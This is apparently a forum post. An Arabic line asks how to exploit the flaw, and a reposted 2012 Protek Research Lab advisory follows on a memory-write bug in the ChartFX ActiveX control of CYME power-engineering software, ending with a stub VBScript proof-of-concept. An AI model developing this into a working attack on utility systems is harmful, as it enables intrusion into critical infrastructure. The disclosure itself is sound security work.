شباب بدى تفسير كيفية استغلال هاى الثغرة وللعم هى تاريخها 4/10/2012
__________________________________________________ __________________________________

Application: CYME Power Engineering Software

Platforms: Windows
Version: CYME version

Secunia: SA48430

{PRL}: 2012-29

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com/

Twitter: @ProtekResearch

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1) Introduction
2) Report Timeline
3) Technical details
4) The Code

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1) Introduction

The CYME Power Engineering software is a suite of applications composed of a network editor, analysis
modules and user-customizable model libraries from which you can choose to get the most powerful solution.

The modules available comprise a variety of advanced applications and extensive libraries for either
transmission/industrial or distribution power network analysis.


This software is use by all major electrical production/distrubtion company

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2) Report Timeline

2012-03-14 Vulnerability reported to Secunia
2012-10-03 Publication of this advisory (180 Days)

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3) Technical details
The vulnerability is caused due to an indexing error in the "ShowPropertiesDialog()"
method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be
exploited to write a single byte value to an arbitrary memory location via the
"pageNumber" parameter. Successful exploitation may allow execution of arbitrary code.

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4) The Code
<object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
<script language='vbscript'>
targetFile = "C:\CYME\CYMDIST50TRIAL\ChartFX.ClientServer.Core. dll"
prototype = "Sub ShowPropertiesDialog ( ByVal context As Variant , ByVal pageNumber As Long )"
memberName = "ShowPropertiesDialog"
progid = "Cfx62ClientServer.Chart"
argCount = 2


target.ShowPropertiesDialog arg1 ,arg2